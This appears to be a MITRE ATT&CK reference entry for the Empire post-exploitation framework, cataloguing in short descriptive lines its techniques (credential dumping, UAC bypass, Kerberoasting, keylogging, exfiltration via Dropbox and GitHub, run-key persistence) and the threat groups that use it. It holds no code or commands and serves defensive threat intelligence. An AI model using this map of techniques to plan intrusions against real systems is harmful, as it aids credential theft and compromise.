Register to stream ATT&CKcon 2.0 October 29-30

Empire

Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]

ID: S0363
Associated Software: EmPyre, PowerShell Empire
Type: TOOL
Platforms: Linux, macOS, Windows
Version: 1.0

Associated Software Descriptions

Name Description
EmPyre [2]
PowerShell Empire [2]

Techniques Used

Domain ID Name Use
Enterprise T1134 Access Token Manipulation Empire can use Invoke-RunAs to make tokens as well as PowerSploit's Invoke-TokenManipulation to manipulate access tokens. [2]
Enterprise T1015 Accessibility Features Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe. [2]
Enterprise T1087 Account Discovery Empire can acquire local and domain user account information. [2]
Enterprise T1217 Browser Bookmark Discovery Empire has the ability to gather browser data such as bookmarks and visited sites. [2]
Enterprise T1088 Bypass User Account Control Empire includes various modules to attempt to bypass UAC for escalation of privileges. [2]
Enterprise T1115 Clipboard Data Empire can harvest clipboard data on both Windows and macOS systems. [2]
Enterprise T1059 Command-Line Interface Empire uses a command-line interface to interact with systems. [2]
Enterprise T1043 Commonly Used Port Empire can conduct command and control over commonly used ports like 80 and 443. [2]
Enterprise T1136 Create Account Empire has a module for creating a new domain user or local user if permissions allow. [2]
Enterprise T1003 Credential Dumping Empire contains an implementation of Mimikatz to gather credentials from memory. [2]
Enterprise T1081 Credentials in Files Empire can use various modules to search for files containing passwords. [2]
Enterprise T1002 Data Compressed Empire can ZIP directories on the target system. [2]
Enterprise T1175 Distributed Component Object Model Empire can utilize Invoke-DCOM to leverage remote COM execution for lateral movement. [2]
Enterprise T1038 DLL Search Order Hijacking Empire contains modules that can discover and exploit various DLL hijacking opportunities. [2]
Enterprise T1482 Domain Trust Discovery Empire has modules for enumerating domain trusts. [2]
Enterprise T1114 Email Collection Empire has the ability to collect emails on a target system. [2]
Enterprise T1106 Execution through API Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks. [2]
Enterprise T1048 Exfiltration Over Alternative Protocol Empire can use Dropbox and GitHub for data exfiltration. [2]
Enterprise T1041 Exfiltration Over Command and Control Channel Empire can send data gathered from a target through the command and control channel. [2]
Enterprise T1068 Exploitation for Privilege Escalation Empire can exploit vulnerabilities such as MS16-032 and MS16-135. [2]
Enterprise T1210 Exploitation of Remote Services Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers. [2]
Enterprise T1083 File and Directory Discovery Empire includes various modules for finding files of interest on hosts and network shares. [2]
Enterprise T1484 Group Policy Modification Empire can use New-GPOImmediateTask to modify a GPO that will install and execute a malicious Scheduled Task. [2]
Enterprise T1179 Hooking Empire contains some modules that leverage API hooking to carry out tasks, such as netripper. [2]
Enterprise T1056 Input Capture Empire includes keylogging capabilities for Windows, Linux, and macOS systems. [2]
Enterprise T1208 Kerberoasting Empire uses PowerSploit's Invoke-Kerberoast to request service tickets and return crackable ticket hashes. [2]
Enterprise T1171 LLMNR/NBT-NS Poisoning and Relay Empire can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks. [2] [4]
Enterprise T1031 Modify Existing Service Empire can utilize built-in modules to modify service binaries and restore them to their original state. [2]
Enterprise T1046 Network Service Scanning Empire can perform port scans from an infected host. [2]
Enterprise T1135 Network Share Discovery Empire can find shared drives on the local system. [2]
Enterprise T1040 Network Sniffing Empire can be used to conduct packet captures on target hosts. [2]
Enterprise T1027 Obfuscated Files or Information Empire has the ability to obfuscate commands using Invoke-Obfuscation. [2]
Enterprise T1075 Pass the Hash Empire can perform pass the hash attacks. [2]
Enterprise T1097 Pass the Ticket Empire can leverage its implementation of Mimikatz to obtain and use Silver and Golden Tickets. [2]
Enterprise T1034 Path Interception Empire contains modules that can discover and exploit various path interception opportunities. [2]
Enterprise T1086 PowerShell Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module. [2] [1]
Enterprise T1145 Private Keys Empire can use modules like Invoke-SessionGopher to extract private key and session information. [2]
Enterprise T1057 Process Discovery Empire can find information about processes running on local and remote systems. [2]
Enterprise T1055 Process Injection Empire contains multiple modules for injecting into processes, such as Invoke-PSInject. [2]
Enterprise T1060 Registry Run Keys / Startup Folder Empire can modify the registry run keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run for persistence. [2]
Enterprise T1105 Remote File Copy Empire can upload and download to and from a victim machine. [2]
Enterprise T1021 Remote Services Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection. [2]
Enterprise T1053 Scheduled Task Empire has modules to interact with the Windows task scheduler. [2]
Enterprise T1113 Screen Capture Empire is capable of capturing screenshots on Windows and macOS systems. [2]
Enterprise T1064 Scripting Empire has modules for executing scripts. [2]
Enterprise T1063 Security Software Discovery Empire can enumerate antivirus software on the target. [2]
Enterprise T1101 Security Support Provider Empire can enumerate Security Support Providers (SSPs) as well as utilize PowerSploit's Install-SSP and Invoke-Mimikatz to install malicious SSPs and log authentication events. [2]
Enterprise T1035 Service Execution Empire can use PsExec to execute a payload on a remote host. [2]
Enterprise T1023 Shortcut Modification Empire can persist by modifying a .LNK file to include a backdoor. [2]
Enterprise T1178 SID-History Injection Empire can add a SID-History to a user if on a domain controller. [2]
Enterprise T1071 Standard Application Layer Protocol Empire can conduct command and control over protocols like HTTP and HTTPS. [2]
Enterprise T1032 Standard Cryptographic Protocol Empire can use TLS to encrypt its C2 channel. [2]
Enterprise T1082 System Information Discovery Empire can enumerate host system information like OS, architecture, applied patches, and more. [2]
Enterprise T1016 System Network Configuration Discovery Empire can acquire network configuration information like DNS servers and network proxies used by a host. [2]
Enterprise T1049 System Network Connections Discovery Empire can enumerate the current network connections of a host. [2]
Enterprise T1099 Timestomp Empire can timestomp any files or payloads placed on a target machine to help them blend in. [2]
Enterprise T1127 Trusted Developer Utilities Empire can use built-in modules to abuse trusted utilities like MSBuild.exe. [2]
Enterprise T1125 Video Capture Empire can capture webcam data on Windows and macOS systems. [2]
Enterprise T1102 Web Service Empire can use Dropbox and GitHub for C2. [2]
Enterprise T1047 Windows Management Instrumentation Empire can use WMI to deliver a payload to a remote host. [2]

Groups That Use This Software

ID Name References
G0052 CopyKittens [5]
G0051 FIN10 [6]
G0073 APT19 [1]
G0064 APT33 [7] [8]
G0010 Turla [9]
G0090 WIRTE [10]

References